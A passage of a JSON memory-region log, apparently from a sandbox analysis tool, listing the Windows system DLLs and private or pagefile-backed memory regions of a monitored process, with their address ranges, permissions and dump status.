"\\Windows\\System32\\user32.dll", "id": "region_1486", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1487", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989185535, "entry_point": 1989083136, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1488", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": "region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1489", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": 
"00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1490", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1491", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1492", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:01:10.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": 
null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1493", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:10.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_1494", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:10.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 532479, "entry_point": 0, "filename": null, "id": "region_1495", "name": "pagefile_0x0000000000080000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 524288, "timestamp": "00:01:10.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 598015, "entry_point": 589824, "filename": "\\Windows\\System32\\en-US\\cmmon32.exe.mui", "id": "region_1496", "name": "cmmon32.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\cmmon32.exe.mui", 
"region_type": "memory_mapped_file", "start_va": 589824, "timestamp": "00:01:10.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_1497", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:10.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_1498", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:10.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 4788223, "entry_point": 0, "filename": null, "id": "region_1499", "name": "pagefile_0x0000000000390000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3735552, "timestamp": "00:01:10.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" 
], "ref_process_dump": null, "size": 65536, "start_va": 4980736, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_1500", "name": "private_0x00000000004c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4980736, "timestamp": "00:01:10.599", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001501-addr_0x00000000004d0000-size_0x000000000013b000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_220", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1290240, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 6336511, "entry_point": 0, "filename": null, "id": "region_1501", "name": "private_0x00000000004d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5046272, "timestamp": "00:01:10.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 15728640, "type": "region", "version": 1 }, "end_va": 28311551, "entry_point": 0, "filename": null, "id": "region_1502", "name": "pagefile_0x0000000000f00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 15728640, "timestamp": "00:01:10.600", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001503-addr_0x0000000000610000-size_0x000000000013d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_221", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1298432, "start_va": 6356992, "type": "region", 
"version": 1 }, "end_va": 7655423, "entry_point": 0, "filename": null, "id": "region_1503", "name": "private_0x0000000000610000", "norm_filename": null, "region_type": "private_memory", "start_va": 6356992, "timestamp": "00:01:10.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2600960, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 10268671, "entry_point": 0, "filename": null, "id": "region_1504", "name": "private_0x0000000000750000", "norm_filename": null, "region_type": "private_memory", "start_va": 7667712, "timestamp": "00:01:10.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6619136, "type": "region", "version": 1 }, "end_va": 6881279, "entry_point": 0, "filename": null, "id": "region_1505", "name": "private_0x0000000000650000", "norm_filename": null, "region_type": "private_memory", "start_va": 6619136, "timestamp": "00:01:11.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1506", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:11.071", "type": "region", "version": 1 }, { "dump": { "filename": 
"", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2007039, "entry_point": 0, "filename": null, "id": "region_1729", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:01:46.862", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 172032, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 5218303, "entry_point": 0, "filename": null, "id": "region_1730", "name": "private_0x00000000004d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5046272, "timestamp": "00:01:46.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 5505023, "entry_point": 0, "filename": null, "id": "region_1731", "name": "private_0x0000000000500000", "norm_filename": null, "region_type": "private_memory", "start_va": 5242880, "timestamp": "00:01:46.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 
5898239, "entry_point": 0, "filename": null, "id": "region_1732", "name": "private_0x0000000000560000", "norm_filename": null, "region_type": "private_memory", "start_va": 5636096, "timestamp": "00:01:46.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2052096, "start_va": 10289152, "type": "region", "version": 1 }, "end_va": 12341247, "entry_point": 0, "filename": null, "id": "region_1733", "name": "private_0x00000000009d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10289152, "timestamp": "00:01:46.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2052096, "start_va": 12386304, "type": "region", "version": 1 }, "end_va": 14438399, "entry_point": 0, "filename": null, "id": "region_1734", "name": "private_0x0000000000bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 12386304, "timestamp": "00:01:46.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 10240000, "start_va": 28311552, "type": "region", "version": 1 }, "end_va": 38551551, "entry_point": 0, "filename": null, "id": "region_1735", "name": "pagefile_0x0000000001b00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 28311552, "timestamp": "00:01:46.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1964048384, "type": "region", "version": 1 }, "end_va": 1964097535, "entry_point": 1964048384, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_1736", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1964048384, "timestamp": "00:01:46.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1964113920, "type": "region", "version": 1 }, "end_va": 1965281279, "entry_point": 1964113920, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_1737", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1964113920, "timestamp": "00:01:46.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_1738", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:01:46.865", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147340288, "type": 
"region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_1739", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:46.865", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1988411391, "entry_point": 1986985984, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1740", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:01:46.868", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001741-addr_0x00000000024d0000-size_0x00000000001f5000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_231", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2052096, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 40652799, "entry_point": 0, "filename": null, "id": "region_1741", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:01:46.871", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 5898240, "type": "region", "version": 1 }, "end_va": 6275071, "entry_point": 5898240, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_1742", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", 
"region_type": "memory_mapped_file", "start_va": 5898240, "timestamp": "00:01:46.885", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 1 }, "end_va": 1962917887, "entry_point": 1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1744", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962868736, "timestamp": "00:01:46.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1945108480, "type": "region", "version": 1 }, "end_va": 1945370623, "entry_point": 1945108480, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1745", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945108480, "timestamp": "00:01:46.888", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001746-addr_0x0000000000690000-size_0x00000000000c0000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_232", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 786432, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 7667711, "entry_point": 0, "filename": null, "id": "region_1746", "name": "private_0x0000000000690000", "norm_filename": null, "region_type": "private_memory", 
"start_va": 6881280, "timestamp": "00:01:46.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 14483456, "type": "region", "version": 1 }, "end_va": 15396863, "entry_point": 0, "filename": null, "id": "region_1747", "name": "pagefile_0x0000000000dd0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14483456, "timestamp": "00:01:46.890", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_1748", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:01:46.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1990918144, "type": "region", "version": 1 }, "end_va": 1991454719, "entry_point": 1990918144, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1749", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1990918144, "timestamp": "00:01:46.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": 
null, "size": 585728, "start_va": 1968701440, "type": "region", "version": 1 }, "end_va": 1969287167, "entry_point": 1968701440, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1750", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1968701440, "timestamp": "00:01:46.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_1751", "name": "pagefile_0x0000000000200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2097152, "timestamp": "00:01:46.894", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11010048, "start_va": 1831272448, "type": "region", "version": 1 }, "end_va": 1842282495, "entry_point": 1831272448, "filename": "\\Windows\\System32\\ieframe.dll", "id": "region_1752", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 1831272448, "timestamp": "00:01:46.897", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1997602816, "type": "region", "version": 1 }, "end_va": 1997623295, "entry_point": 1997602816, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_1753", "name": "psapi.dll", "norm_filename": 
"c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1997602816, "timestamp": "00:01:46.897", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1919811584, "type": "region", "version": 1 }, "end_va": 1920057343, "entry_point": 1919811584, "filename": "\\Windows\\System32\\oleacc.dll", "id": "region_1754", "name": "oleacc.dll", "norm_filename": "c:\\windows\\system32\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 1919811584, "timestamp": "00:01:46.898", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1984274431, "entry_point": 1971388416, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1755", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:01:46.898", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997668352, "type": "region", "version": 1 }, "end_va": 1998024703, "entry_point": 1997668352, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1756", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997668352, "timestamp": "00:01:46.899", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" 
], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1969291264, "type": "region", "version": 1 }, "end_va": 1971367935, "entry_point": 1969291264, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_1757", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1969291264, "timestamp": "00:01:46.900", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 4853759, "entry_point": 4849664, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_1758", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 4849664, "timestamp": "00:01:46.901", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 4923391, "entry_point": 0, "filename": null, "id": "region_1759", "name": "pagefile_0x00000000004b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4915200, "timestamp": "00:01:46.903", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1948377087, "entry_point": 1946681344, 
"filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1760", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:46.903", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 5509119, "entry_point": 5505024, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1761", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 5505024, "timestamp": "00:01:46.904", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 5578751, "entry_point": 0, "filename": null, "id": "region_1762", "name": "pagefile_0x0000000000550000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5570560, "timestamp": "00:01:46.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 40697856, "type": "region", "version": 1 }, "end_va": 43642879, "entry_point": 40697856, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1763", "name": "sortdefault.nls", 
"norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 40697856, "timestamp": "00:01:46.906", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1962737664, "type": "region", "version": 1 }, "end_va": 1962848255, "entry_point": 1962737664, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1764", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1962737664, "timestamp": "00:01:46.908", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 1908015104, "type": "region", "version": 1 }, "end_va": 1908203519, "entry_point": 1908015104, "filename": "\\Windows\\System32\\mlang.dll", "id": "region_1765", "name": "mlang.dll", "norm_filename": "c:\\windows\\system32\\mlang.dll", "region_type": "memory_mapped_file", "start_va": 1908015104, "timestamp": "00:01:46.910", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985765375, "entry_point": 1984495616, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_1766", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:46.911", "type": "region", "version": 1 }, { "dump": { "filename": 
"", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1993277440, "type": "region", "version": 1 }, "end_va": 1994280959, "entry_point": 1993277440, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_1767", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1993277440, "timestamp": "00:01:46.911", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 5509119, "entry_point": 0, "filename": null, "id": "region_1768", "name": "pagefile_0x0000000000540000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5505024, "timestamp": 